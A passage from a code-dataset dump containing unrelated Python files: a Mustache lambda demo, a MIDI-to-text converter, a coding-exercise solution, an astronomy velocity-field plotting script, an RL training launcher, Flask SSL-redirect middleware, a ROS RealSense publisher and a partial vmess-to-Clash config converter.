So it is that the body of\n {{#eval}}{{#upper}}this{{/upper}}{{/eval}} is evaluated.\n \"\"\"\n\n def echo(text: str, render: Callable) -> str:\n \"\"\"Echo the given text.\"\"\"\n return text\n\n def evaluate(text: str, render: Callable) -> str:\n \"\"\"Evaluate the given text.\"\"\"\n return render(text)\n\n def upper(text: str, render: Callable) -> str:\n \"\"\"Upper-case the given text.\"\"\"\n return text.upper()\n\n template = textwrap.dedent(template).strip()\n data = {\"echo\": echo, \"eval\": evaluate, \"upper\": upper}\n print(chevron.render(template=template, data=data))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mustache/04-lambdas/chevron-lambda.py","file_name":"chevron-lambda.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626398448","text":"import fnmatch\nimport os\nimport argparse\nimport warnings\n\nimport mido\nfrom mido import MidiFile, MidiTrack\n\nimport music21\nfrom music21 import *\n\nimport numpy as np\nimport math\n\nfrom tqdm import tqdm\n\n\n\"\"\"Converts MIDI file to text\"\"\"\ndef midiToText(filename):\n\n tqdm.write('File: {}'.format(filename))\n\n # read from input filename\n mid = MidiFile(filename)\n\n tqdm.write('Length (sec): {}'.format(mid.length))\n tqdm.write('Ticks per beat: {}'.format(mid.ticks_per_beat)) # e.g. 96/480 per beat (crotchet)\n\n\n # check for muliple tempos (e.g. change in tempo halfway through piece)\n check_multiple_tempos = []\n\n # instantiate final tempo for piece\n tempo = 120\n\n \"\"\"\n What is a channel? vs What is a track?\n e.g.:\n • Track 1 contains the notes played by right hand with a piano voice on channel 0.\n • Track 2 contains the notes played by left hand with the same piano voice on channel 0, too.\n • Track 3 contains the bass voice on channel 1.\n • Track 4 contains a clarinet voice on channel 2.\n • Track 5 contains the drums on channel 9.\n \"\"\"\n\n for i, track in enumerate(mid.tracks):\n\n tqdm.write('Track {}: {}'.format(i, track.name))\n\n for msg in track:\n if msg.type == 'set_tempo': # Note: is_meta\n msg_bpm = mido.tempo2bpm(msg.tempo) # convert from microseconds to bpm (e.g. 
500000 us to 120 bpm)\n msg_bpm_int = int(msg_bpm)\n if msg_bpm != msg_bpm_int:\n warnings.warn('Non-integer bpm: {} (tempo) -> {} (bpm)'.format(msg.tempo, msg_bpm))\n check_multiple_tempos.append(msg_bpm_int)\n\n if len(check_multiple_tempos) > 1:\n warnings.warn('Multiple tempos: {}'.format(check_multiple_tempos))\n tempo = check_multiple_tempos[0]\n \n elif len(check_multiple_tempos) == 0: # does this even happen?\n warnings.warn('No tempo: setting default 120')\n tempo = 120\n\n else: # only one tempo\n tempo = check_multiple_tempos[0]\n\n print('Tempo: {}'.format(tempo))\n\n\n # get total time of piece\n # mid.length returns total playback time in seconds\n length_in_ticks = mid.length/60*tempo*mid.ticks_per_beat #mido.second2tick(mid.length, ticks_per_beat=mid.ticks_per_beat, tempo=tempo)\n print(length_in_ticks)\n\n\n # contains arrays of messages (only notes) for each track\n messages_list = []\n\n for i, track in enumerate(mid.tracks):\n\n # create new nested list for each track\n messages_list.append([])\n\n for msg in track:\n\n if msg.type == 'note_on':\n messages_list[i].append(msg)\n\n elif msg.type == 'note_off':\n # convert to note_on with velocity=0\n new_msg = mido.Message('note_on', note=msg.note, velocity=0, time=msg.time)\n messages_list[i].append(new_msg)\n\n \n # remove empty lists\n messages_list = [track for track in messages_list if len(track) > 0]\n\n\n\n # group elements into similar delta times (e.g. time: [48, 0], [96, 0, 0, 0])\n\n grouped_messages_list = []\n for x, track in enumerate(messages_list):\n grouped_messages_list.append([])\n\n count = 0\n temp_count = 0\n while count < len(track):\n\n # add current msg (should be time ≠ 0)\n new_group = {\n 'group': [track[count]], \n 'time': track[count].time\n }\n \n # add one for current msg added at start\n count += 1\n\n # freeze current value of count\n temp_count = count\n\n # add all following msgs that are time = 0\n for i in range(len(track) - temp_count):\n\n msg = track[temp_count+i]\n if msg.time == 0:\n new_group['group'].append(msg)\n count += 1\n\n # break before next non-zero time\n else:\n break\n\n # append temp grouped msgs back to group_messages\n grouped_messages_list[x].append(new_group)\n\n\n\n \"\"\"\n Generation of text\n \n Set top track (lowest index) to be 'melody'\n With all other tracks to be 'accomp' where will be an integer starting from 0 (accompaniment)\n \n Note: Actual \"theoretical\" melody may cross over into other tracks (i.e. \"accompaniment\")\n \"\"\"\n\n # instantiate text list\n # [CLS] (classification) used for indicating start of input (using other model standards)\n result_list = ['[CLS]', 'tempo{}'.format(tempo), '[127]']\n\n\n # loop through grouped messages and check for delta time differences between tracks\n\n # to keep track of time passed during the piece\n current_wait_time_elapsed = 0\n time_embed_counter = 126\n time_embed_interval = math.ceil(length_in_ticks / 127) # rounding up - should prevent underflow of time i.e. 
[0] comes before end of piece\n\n while max(len(track) for track in grouped_messages_list) > 0:\n\n all_first_groups = []\n for t in grouped_messages_list:\n\n # if track is empty replace with None\n if len(t) == 0:\n all_first_groups.append(None)\n\n else:\n # use pop to remove from list\n all_first_groups.append(t.pop(0))\n \n # all first times - use None for empty tracks (already replaced with None above)\n all_first_times = [group['time'] if group is not None else None for group in all_first_groups]\n\n\n # get min times in all_first_times ignoring None\n min_dt = min(t for t in all_first_times if t is not None)\n\n # append wait\n if min_dt != 0:\n wait_text = 'wait:{}'.format(min_dt)\n result_list.append(wait_text)\n\n current_wait_time_elapsed += min_dt\n\n if time_embed_counter != 0:\n\n # check for insertion of wait (word) embedding\n if current_wait_time_elapsed > time_embed_interval:\n\n time_embed_multiple = current_wait_time_elapsed // time_embed_interval\n time_pushover = current_wait_time_elapsed - time_embed_interval * time_embed_multiple\n\n word_embedding = '[{}]'.format(time_embed_counter)\n result_list.append(word_embedding)\n\n current_wait_time_elapsed = time_pushover\n time_embed_counter -= time_embed_multiple\n\n # time_embed_counter cannot be 0 due to integer rounding\n\n for i, track_group in enumerate(all_first_groups):\n\n # check if None (no notes left in that track)\n if track_group is None:\n continue\n\n\n if all_first_times[i] == min_dt:\n for msg in track_group['group']:\n\n # convert from 1-88 to A4\n note = music21.note.Note(msg.note)\n note_name = note.nameWithOctave\n\n track_type = 'melody' if i == 0 else 'accomp{}'.format(i-1)\n new_text = '{track_type} v{vel} {note}'.format(track_type=track_type, vel=msg.velocity, note=note_name)\n\n result_list.append(new_text)\n\n\n elif all_first_times[i] > min_dt:\n\n time_difference = all_first_times[i] - min_dt\n\n # prepend filler wait to remaining track\n new_filler_group = {'group': all_first_groups[i]['group'], 'time': time_difference} # no need to .copy()\n grouped_messages_list[i].insert(0, new_filler_group)\n\n\n\n # Possible scenario: ONLY if at the start, one track has a rest e.g. 
time=96\n\n print('Final time embedding: {}'.format(time_embed_counter))\n result_list.append('[0]')\n result_list.append('[SEP]')\n\n result_string = ' '.join(result_list)\n\n return result_string\n\n\n\n# Testing purposes\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--file', '-f', help='midi filename')\n args = parser.parse_args()\n\n if args.file:\n print(midiToText(args.file))","sub_path":"midi2text/midi2text_split.py","file_name":"midi2text_split.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131196093","text":"'''\n\nWrite a function:\n\ndef solution(A)\nthat, given an array A of N integers, returns the smallest positive integer (greater than 0) that does not occur in A.\n\nFor example, given A = [1, 3, 6, 4, 1, 2], the function should return 5.\n\nGiven A = [1, 2, 3], the function should return 4.\n\nGiven A = [−1, −3], the function should return 1.\n\nWrite an efficient algorithm for the following assumptions:\n\nN is an integer within the range [1..100,000];\neach element of array A is an integer within the range [−1,000,000..1,000,000].\n\n'''\n\n# Solution\n\na = [1, 2, 3, 4]\n\n\ndef missint(a):\n cleana = sorted(set(a))\n a_max = max(cleana)\n\n lst = []\n\n for i in cleana:\n\n if i < 0:\n return (1)\n\n for i in range(1, a_max + 1):\n\n if i in cleana:\n continue\n else:\n lst.append(i)\n\n if not lst:\n print(a_max + 1)\n else:\n print(min(lst))\n\nmissint(a)","sub_path":"MissingIntegerCodility.py","file_name":"MissingIntegerCodility.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602620567","text":"#Plot the vlos velocity field of the RC, with and without subtracting the Solar motion\nimport os, os.path\nimport sys\nimport copy\nimport pickle\nimport numpy\nfrom galpy.util import bovy_plot, bovy_coords, save_pickles\nfrom matplotlib import pyplot\nfrom matplotlib import transforms\nimport apogee.tools.read as apread\nimport pixelize_sample\nfrom plot_2dkinematics import vlosgal, modelvlosgal\nfrom plot_psd import _ADDLLOGGCUT, \\\n _RCXMIN, _RCXMAX, _RCYMIN, _RCYMAX, _RCDX\ndef plot_rckinematics(plotfilename,subsun=False):\n #Set up 3 axes\n bovy_plot.bovy_print(fig_width=8.,axes_labelsize=14)\n axdx= 1./3.\n #APOGEE-RC observations\n tdy= (_RCYMAX-_RCYMIN+4.5)/(_RCXMAX-_RCXMIN+4.5)*axdx\n obsAxes= pyplot.axes([0.1,(1.-tdy)/2.,axdx,tdy])\n pyplot.sca(obsAxes)\n data= apread.rcsample()\n if _ADDLLOGGCUT:\n data= data[data['ADDL_LOGG_CUT'] == 1]\n #Cut\n indx= (numpy.fabs(data['RC_GALZ']) < 0.25)*(data['METALS'] > -1000.)\n data= data[indx]\n #Get velocity field\n pixrc= pixelize_sample.pixelXY(data,\n xmin=_RCXMIN-2.25,xmax=_RCXMAX+2.25,\n ymin=_RCYMIN-2.25,ymax=_RCYMAX+2.25,\n dx=_RCDX,dy=_RCDX)\n if subsun:\n vmin, vmax= 0., 250.\n pixrc.plot(lambda x: vlosgal(x),\n func=lambda x: numpy.fabs(numpy.median(x)),\n zlabel=r'$|\\mathrm{median}\\ V^{\\mathrm{GC}}_{\\mathrm{los}}|\\,(\\mathrm{km\\,s}^{-1})$',\n vmin=vmin,vmax=vmax)\n else:\n vmin, vmax= -75., 75.\n img= pixrc.plot('VHELIO_AVG',\n vmin=vmin,vmax=vmax,overplot=True,\n colorbar=False)\n resv= pixrc.plot('VHELIO_AVG',\n justcalc=True,returnz=True) #for later\n bovy_plot.bovy_text(r'$\\mathrm{typical\\ uncertainty\\!:}\\ 3\\,\\mathrm{km\\,s}^{-1}$',\n bottom_left=True,size=8.25)\n bovy_plot.bovy_text(r'$|Z| < 250\\,\\mathrm{pc}$',top_right=True,size=10.)\n 
pyplot.annotate(r'$\\mathrm{APOGEE\\!-\\!RC\\ data}$',\n (0.5,1.09),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',size=10.)\n pyplot.axis([pixrc.xmin,pixrc.xmax,pixrc.ymin,pixrc.ymax])\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(r'$X_{\\mathrm{GC}}\\,(\\mathrm{kpc})$',\n r'$Y_{\\mathrm{GC}}\\,(\\mathrm{kpc})$')\n #Colorbar\n cbaxes = pyplot.axes([0.1625,(1.-tdy)/2.+tdy+0.065,2.*axdx-0.195,0.02])\n CB1= pyplot.colorbar(img,orientation='horizontal',\n cax=cbaxes)#,ticks=[-16.,-8.,0.,8.,16.])\n CB1.set_label(r'$\\mathrm{median}\\ V_{\\mathrm{los}}\\,(\\mathrm{km\\,s}^{-1})$',labelpad=-35,fontsize=14.)\n #Now calculate the expected field\n xgrid= numpy.arange(_RCXMIN-2.25+_RCDX/2.,_RCXMAX+2.25+_RCDX/2.,_RCDX)\n ygrid= numpy.arange(_RCYMIN-2.25+_RCDX/2.,_RCYMAX+2.25+_RCDX/2.,_RCDX)\n xv,yv= numpy.meshgrid(xgrid,ygrid,indexing='ij')\n rs= numpy.sqrt(xv**2.+yv**2.)\n phis= numpy.arctan2(yv,xv)\n d,l= bovy_coords.rphi_to_dl_2d(rs/8.,phis)\n expec_vlos= numpy.empty((len(xgrid),len(ygrid)))\n for ii in range(len(xgrid)):\n for jj in range(len(ygrid)):\n expec_vlos[ii,jj]= modelvlosgal(rs[ii,jj],phis[ii,jj],l[ii,jj],\n vc=218.,vtsun=242.)\n modelAxes= pyplot.axes([0.03+axdx,(1.-tdy)/2.,axdx,tdy])\n pyplot.sca(modelAxes)\n xlabel=r'$X_{\\mathrm{GC}}\\,(\\mathrm{kpc})$'\n ylabel=r'$Y_{\\mathrm{GC}}\\,(\\mathrm{kpc})$'\n indx= True-numpy.isnan(resv)\n plotthis= copy.copy(expec_vlos)\n plotthis[numpy.isnan(resv)]= numpy.nan #turn these off\n bovy_plot.bovy_dens2d(plotthis.T,origin='lower',cmap='jet',\n interpolation='nearest',\n xlabel=xlabel,ylabel=ylabel,\n xrange=[_RCXMIN-2.25,_RCXMAX+2.25],\n yrange=[_RCYMIN-2.25,_RCYMAX+2.25],\n contours=False,\n vmin=vmin,vmax=vmax,overplot=True,zorder=3)\n if True:\n #Now plot the pixels outside the APOGEE data set\n plotthis= copy.copy(expec_vlos)\n plotthis[True-numpy.isnan(resv)]= numpy.nan #turn these off\n bovy_plot.bovy_dens2d(plotthis.T,origin='lower',cmap='jet',\n interpolation='nearest',\n alpha=0.3,\n xrange=[_RCXMIN-2.25,_RCXMAX+2.25],\n yrange=[_RCYMIN-2.25,_RCYMAX+2.25],\n contours=False,\n vmin=vmin,vmax=vmax,overplot=True,\n zorder=0)\n pyplot.annotate(r'$\\mathrm{Bovy\\ et.\\ al\\ (2012)\\ model}$',\n (1.02,1.09),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',size=10.,zorder=3)\n pyplot.axis([_RCXMIN-2.25,_RCXMAX+2.25,_RCYMIN-2.25,_RCYMAX+2.25])\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(xlabel,r'$ $')\n #Finally, add a polar plot of the whole disk\n res= 51\n rmin, rmax= 0.2, 2.4\n xgrid= numpy.linspace(0.,2.*numpy.pi*(1.-1./res/2.),\n 2.*res)\n ygrid= numpy.linspace(rmin,rmax,res)\n nx= len(xgrid)\n ny= len(ygrid)\n savefile= 'expec_vlos.sav'\n if os.path.exists(savefile):\n savefile= open(savefile,'rb')\n expec_vlos= pickle.load(savefile)\n savefile.close()\n else:\n expec_vlos= numpy.zeros((nx,ny))\n for ii in range(nx):\n for jj in range(ny):\n R, phi= ygrid[jj], xgrid[ii]\n d,l= bovy_coords.rphi_to_dl_2d(R,phi)\n expec_vlos[ii,jj]= modelvlosgal(R*8.,phi,l,\n vc=218.,vtsun=242.)\n save_pickles(savefile,expec_vlos)\n plotxgrid= numpy.linspace(xgrid[0]-(xgrid[1]-xgrid[0])/2.,\n xgrid[-1]+(xgrid[1]-xgrid[0])/2.,\n len(xgrid)+1)\n plotygrid= numpy.linspace(ygrid[0]-(ygrid[1]-ygrid[0])/2.,\n ygrid[-1]+(ygrid[1]-ygrid[0])/2.,\n len(ygrid)+1)\n fullmodelAxes= pyplot.axes([-0.05+2.*axdx,(1.-tdy)/2.,axdx,tdy],polar=True)\n ax= fullmodelAxes\n pyplot.sca(fullmodelAxes)\n vmin, vmax= -150., 150.\n zlabel= r'$\\mathrm{line\\!-\\!of\\!-\\!sight\\ velocity}\\ 
(\\mathrm{km\\,s}^{-1})$'\n out= ax.pcolor(plotxgrid,plotygrid,expec_vlos.T,cmap='jet',\n vmin=vmin,vmax=vmax,clip_on=False)\n shrink= 0.8\n if False:\n CB1= pyplot.colorbar(out,shrink=shrink)\n bbox = CB1.ax.get_position().get_points()\n CB1.ax.set_position(transforms.Bbox.from_extents(bbox[0,0]+0.025,\n bbox[0,1],\n bbox[1,0],\n bbox[1,1]))\n CB1.set_label(zlabel)\n from matplotlib.patches import FancyArrowPatch\n arr= FancyArrowPatch(posA=(numpy.pi+0.1,1.8),\n posB=(3*numpy.pi/2.+0.1,1.8),\n arrowstyle='->', \n connectionstyle='arc3,rad=%4.2f' % (numpy.pi/8.-0.05),\n shrinkA=2.0, shrinkB=2.0, mutation_scale=20.0, \n mutation_aspect=None,fc='k')\n ax.add_patch(arr)\n bovy_plot.bovy_text(numpy.pi+0.17,1.7,r'$\\mathrm{Galactic\\ rotation}$',\n rotation=-30.,size=9.)\n radii= numpy.array([0.5,1.,1.5,2.,2.5])\n labels= []\n for r in radii:\n ax.plot(numpy.linspace(0.,2.*numpy.pi,501,),\n numpy.zeros(501)+r,ls='-',color='0.65',zorder=1,lw=0.5)\n labels.append(r'$%i$' % int(r*8.))\n pyplot.rgrids(radii,labels=labels,angle=147.5)\n thetaticks = numpy.arange(0,360,45)\n # set ticklabels location at x times the axes' radius\n ax.set_thetagrids(thetaticks,frac=1.16,backgroundcolor='w',zorder=3)\n bovy_plot.bovy_text(3.*numpy.pi/4.+0.06,2.095,r'$\\mathrm{kpc}$',size=10.)\n pyplot.ylim(0.,2.8)\n #Plot the box\n xs= numpy.linspace(_RCXMIN-2.25,_RCXMAX+2.25,101)\n ys= numpy.ones(101)*(_RCYMIN-2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the box\n xs= numpy.linspace(_RCXMIN-2.25,_RCXMAX+2.25,101)\n ys= numpy.ones(101)*(_RCYMAX+2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the box\n ys= numpy.linspace(_RCYMIN-2.25,_RCYMAX+2.25,101)\n xs= numpy.ones(101)*(_RCXMIN-2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the box\n ys= numpy.linspace(_RCYMIN-2.25,_RCYMAX+2.25,101)\n xs= numpy.ones(101)*(_RCXMAX+2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the connectors on the modelAxes\n xlow=-4.*8.\n ylow= 2.77*8.\n xs= numpy.linspace(xlow,(_RCXMAX+2.25),101)\n ys= (ylow-(_RCYMAX+2.25))/(xlow-(_RCXMAX+2.25))*(xs-xlow)+ylow\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n line= ax.plot(phis,rs,':',lw=1.,color='k',zorder=2)\n line[0].set_clip_on(False)\n xlow=-4.*8.\n ylow= -2.77*8.\n xs= numpy.linspace(xlow,(_RCXMAX+2.25),101)\n ys= (ylow-(_RCYMIN-2.25))/(xlow-(_RCXMAX+2.25))*(xs-xlow)+ylow\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n line= ax.plot(phis,rs,':',lw=1.,color='k',zorder=2)\n line[0].set_clip_on(False)\n #Colorbar\n cbaxes = pyplot.axes([0.01+2.*axdx,(1.-tdy)/2.+tdy+0.065,axdx-0.125,0.02])\n CB1= pyplot.colorbar(out,orientation='horizontal',\n cax=cbaxes,ticks=[-150.,-75.,0.,75.,150.])\n #CB1.set_label(r'$\\mathrm{median}\\ V_{\\mathrm{los}}\\,(\\mathrm{km\\,s}^{-1})$',labelpad=-35,fontsize=14.)\n bovy_plot.bovy_end_print(plotfilename,dpi=300)\n return None\n\nif __name__ == '__main__':\n if len(sys.argv) > 2:\n plot_rckinematics(sys.argv[1],subsun=True)\n else:\n plot_rckinematics(sys.argv[1],subsun=False)\n","sub_path":"py/plot_rckinematics.py","file_name":"plot_rckinematics.py","file_ext":"py","file_size_in_byte":10322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42321147","text":"import os\nimport 
subprocess\nimport datetime\nimport time\n\nseeds = [64,42,96,33,11]\n\ntime_start = datetime.datetime.now()\n\nfor seed in seeds:\n\tcommand = \"python train.py --algo ppo2 --env HalfCheetahBulletEnv-v0 -n 2000000 --tensorboard-log /tmp/stable-baselines/ --verbose 0 --seed \" + str(seed)\n\tsubprocess.call(command, shell=True)\n\tprint(\"Finished training run with seed {}\".format(seed))\n\ntime_end = datetime.datetime.now()\ntime_spent = time_end - time_start\ntime_spent_mins = time_spent.seconds / 60\n\nprint(\"Finished training\")\nprint(\"Training took {} minutes\".format(time_spent_mins))\n","sub_path":"experiment_ppo2_halfcheetah.py","file_name":"experiment_ppo2_halfcheetah.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"404532370","text":"from flask import current_app, request, redirect\n\nSKIP_SSL_CHECK = set()\n\ndef _should_redirect():\n \"\"\"Helper to determine if this request should be redirected or not\"\"\"\n #! Do not redirect if we *are* in debug or testing modes\n criteria = [\n request.is_secure,\n current_app.debug,\n current_app.testing,\n request.headers.get('X-Forwarded-Proto', 'http') == 'https'\n ]\n\n return not any(criteria) and request.url.startswith('http://')\n\n\ndef redirect_to_ssl():\n \"\"\"Before request helper to ensure we are using HTTPS\"\"\"\n if request.endpoint in SKIP_SSL_CHECK:\n return\n\n if _should_redirect():\n url = request.url.replace('http://', 'https://', 1)\n return redirect(url, code=301)\n\n\ndef allow_http(func):\n \"\"\"Helper to mark an endpoint as not needing https redirection\"\"\"\n SKIP_SSL_CHECK.add(func.__name__)\n return func","sub_path":"ud/middleware/ssl.py","file_name":"ssl.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"68987902","text":"#!/usr/bin/env python\nimport rospy\nfrom rslite import rsconfig\nfrom rslite import rslite\nfrom std_msgs.msg import String, Header\nfrom sensor_msgs.msg import Image, PointCloud2, PointField\nimport sensor_msgs.point_cloud2 as pc2\nimport time\nimport math\nimport numpy as np\nfrom cv_bridge import CvBridge\nimport pyrealsense2 as rs\n\nimport tf\nimport tf2_ros\nimport geometry_msgs.msg\nimport pcl_msgs\nimport pcl_ros\n\n\ndef imagePub(pc = False):\n #Initialise RS Camera\n config = rsconfig.depth_480_fps_90() #Must have colour stream\n cam = rslite.RSCam(config, True)\n cam.startStreaming()\n \n #Initialise ROS Publishers\n pubDepth = rospy.Publisher('RSL/Image/Depth', Image, queue_size=10)\n pubColor = rospy.Publisher('RSL/Image/Color', Image, queue_size=10)\n if pc:\n pubPC = rospy.Publisher('RSL/Pointcloud', PointCloud2, queue_size=10)\n rospy.init_node('RSLCamera', anonymous=True)\n publishBasicTransform('rs_frame')\n rate = rospy.Rate(120) # 120Hz\n while not rospy.is_shutdown():\n frameDepth = cam.pollDisparityFrame()\n if frameDepth:\n depthImage = generateImageFromFrame(frameDepth)\n pubDepth.publish(depthImage)\n frameColor = cam.pollColorFrame()\n frameColor = False #TODO REMOVE####################\n if frameColor:\n colorImage = generateImageFromFrame(frameColor)\n pubColor.publish(colorImage)\n framePC = cam.pollPointCloud()\n if pc and framePC:\n pointcloud = generatePointcloud(framePC)\n pubPC.publish(pointcloud)\n rate.sleep()\n cam.stopStreaming()\n\ndef generatePointcloud(frame):\n frame = rs.points(frame)\n pc = PointCloud2()\n pc.header.seq = frame.frame_number\n 
pc.header.stamp.secs = math.floor(frame.get_timestamp()/1000)\n pc.header.stamp.nsecs = int((frame.get_timestamp()%1000)*10**6)\n pc.header.frame_id = \"rs_frame\" #TODO Sort this shit out\n pc.height = 1 #As is unordered TODO check this\n pc.width = frame.size()\n pc.fields = genPointField()\n pc.is_bigendian = False #TODO Check\n pc.data = np.asanyarray(frame.get_vertices()).tobytes()\n pc.is_dense = True\n pc.point_step = 12\n pc.row_step = pc.point_step*pc.width\n return pc\n\n\ndef genPointField():\n #Does not support RGB\n x = PointField()\n x.name = \"x\"\n x.offset = 0\n x.datatype = 7\n x.count = 1\n y = PointField()\n y.name = \"y\"\n y.offset = 4\n y.datatype = 7\n y.count = 1\n z = PointField()\n z.name = \"z\"\n z.offset = 8\n z.datatype = 7\n z.count = 1\n # rgb = PointField()\n # rgb.name = \"rgb\"\n # rgb.offset = 12\n # rgb.\n return [x,y,z]\n \n \ndef publishBasicTransform(name):#TODO this should not be static and should have correct rotation\n broadcaster = tf2_ros.StaticTransformBroadcaster()\n static_transformStamped = geometry_msgs.msg.TransformStamped()\n\n static_transformStamped.header.stamp = rospy.Time.now()\n static_transformStamped.header.frame_id = \"world\"\n static_transformStamped.child_frame_id = name\n\n static_transformStamped.transform.translation.x = float(0)\n static_transformStamped.transform.translation.y = float(0)\n static_transformStamped.transform.translation.z = float(0)\n\n quat = tf.transformations.quaternion_from_euler(\n float(math.pi/2),float(math.pi),float(-math.pi/2))\n static_transformStamped.transform.rotation.x = quat[0]\n static_transformStamped.transform.rotation.y = quat[1]\n static_transformStamped.transform.rotation.z = quat[2]\n static_transformStamped.transform.rotation.w = quat[3]\n\n broadcaster.sendTransform(static_transformStamped)\n\ndef generateImageFromFrame(frame):\n frame = rs.video_frame(frame)\n img = Image()\n img.header.seq = frame.frame_number\n img.header.stamp.secs = math.floor(frame.get_timestamp()/1000)\n img.header.stamp.nsecs = int((frame.get_timestamp()%1000)*10**6)\n img.header.frame_id = \"rs_frame\" #TODO Sort this shit out\n img.height = frame.get_height()\n img.width = frame.get_width()\n img.encoding = getROSImageFormatFromRS(frame.get_profile().format())\n img.is_bigendian = False\n img.step = frame.get_stride_in_bytes()\n bridge = CvBridge()\n data = np.asanyarray(frame.get_data())\n img.data = bridge.cv2_to_imgmsg(data, encoding='passthrough').data\n return img\n\ndef getROSImageFormatFromRS(rsformat):\n if(rsformat == rs.format.bgr8):\n return \"bgr8\"\n elif(rsformat == rs.format.z16):\n return \"mono16\"\n else:\n print(\"Error: Unknown or unsupported image format\")\n print(rsformat)\n raise RuntimeError\n\n\nif __name__ == '__main__':\n try:\n imagePub(True)\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/rslite_node.py","file_name":"rslite_node.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"495696081","text":"# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nimport base64\r\nimport json\r\nimport yaml\r\n\r\n\r\ndef get_vmess(url):\r\n \"\"\"\r\n 获取vmess订阅\r\n :param url:\r\n :return:\r\n \"\"\"\r\n r = requests.get(url)\r\n vmess_content = r.text\r\n if not vmess_content.endswith(\"==\"):\r\n vmess_content += \"==\"\r\n\r\n vmess_list = base64.b64decode(vmess_content).decode().split(\"vmess://\")\r\n vmess_list = map(lambda x: base64.b64decode(x + \"==\").decode(), 
vmess_list)\r\n vmess_list = filter(len, vmess_list)\r\n vmess_list = map(json.loads, vmess_list)\r\n vmess_list = map(vmess_sub_to_clash, vmess_list)\r\n return remove_vmess_node(vmess_list, \"特殊\")\r\n\r\n\r\ndef vmess_sub_to_clash(d):\r\n \"\"\"\r\n 将vmess订阅结果转换成clash的proxy格式\r\n :param d:\r\n :return:\r\n \"\"\"\r\n new_d = {\r\n \"name\": d[\"ps\"],\r\n \"type\": \"vmess\",\r\n \"server\": d[\"add\"],\r\n \"port\": d[\"port\"],\r\n \"uuid\": d[\"id\"],\r\n \"alterId\": 2,\r\n \"cipher\": \"auto\",\r\n \"tls\": True\r\n }\r\n return new_d\r\n\r\n\r\ndef remove_vmess_node(vmess_list, keyword):\r\n \"\"\"\r\n 将指定的关键字节点从节点列表中移除\r\n :param vmess_list:\r\n :param keyword:\r\n :return:\r\n \"\"\"\r\n new_vmess_list = []\r\n for n in vmess_list:\r\n if keyword in n[\"name\"]:\r\n continue\r\n new_vmess_list.append(n)\r\n return new_vmess_list\r\n\r\n\r\ndef generate_proxy_groups(proxy_groups: list, proxies: list) -> list:\r\n \"\"\"\r\n - 🇭🇰 香港节点\r\n - 🇨🇳 台湾节点\r\n - 🇸🇬 新加坡节点\r\n - 🇯🇵 日本节点\r\n - 🇺🇲 美国节点\r\n - 🚀 手动切换\r\n :param proxy_groups:\r\n :param proxies:\r\n :return:\r\n \"\"\"\r\n um = []\r\n jp = []\r\n sg = []\r\n cn = []\r\n hk = []\r\n for n in proxies:\r\n if \"美国\" in n[\"name\"]:\r\n um.append(n[\"name\"])\r\n elif \"日本\" in n[\"name\"]:\r\n jp.append(n[\"name\"])\r\n elif \"新加坡\" in n[\"name\"]:\r\n sg.append(n[\"name\"])\r\n elif \"台湾\" in n[\"name\"]:\r\n cn.append(n[\"name\"])\r\n elif \"港\" in n[\"name\"]:\r\n hk.append(n[\"name\"])\r\n\r\n for idx, value in enumerate(proxy_groups):\r\n if value[\"name\"] == \"🇭🇰 香港节点\":\r\n proxy_groups[idx][\"proxies\"] = hk\r\n if value[\"name\"] == \"🇨🇳 台湾节点\":\r\n proxy_groups[idx][\"proxies\"] = cn\r\n if value[\"name\"] == \"🇸🇬 新加坡节点\":\r\n proxy_groups[idx][\"proxies\"] = sg\r\n if value[\"name\"] == \"🇯🇵 日本��点\":\r\n proxy_groups[idx][\"proxies\"] = jp\r\n if value[\"name\"] == \"🇺🇲 美国节点\":\r\n proxy_groups[idx][\"proxies\"] = um\r\n if value[\"name\"] == \"🚀 手动切换\":\r\n proxy_groups[idx][\"proxies\"] = [n[\"name\"] for n in proxies]\r\n\r\n return proxy_groups\r\n\r\n\r\ndef get_rule():\r\n \"\"\"\r\n get remote rule, and set it to global variable\r\n :return:\r\n \"\"\"\r\n global config\r\n with open(\"config/clash-my-rule.yml\") as f:\r\n my_rule = yaml.safe_load(f)\r\n r = requests.get(config.rule_url)\r\n rule = yaml.safe_load(r.text)\r\n rule = my_rule + rule\r\n\r\n return rule\r\n\r\n\r\ndef get_clash_sub(vmess_url):\r\n \"\"\"\r\n :param vmess_url:\r\n :return:\r\n \"\"\"\r\n # 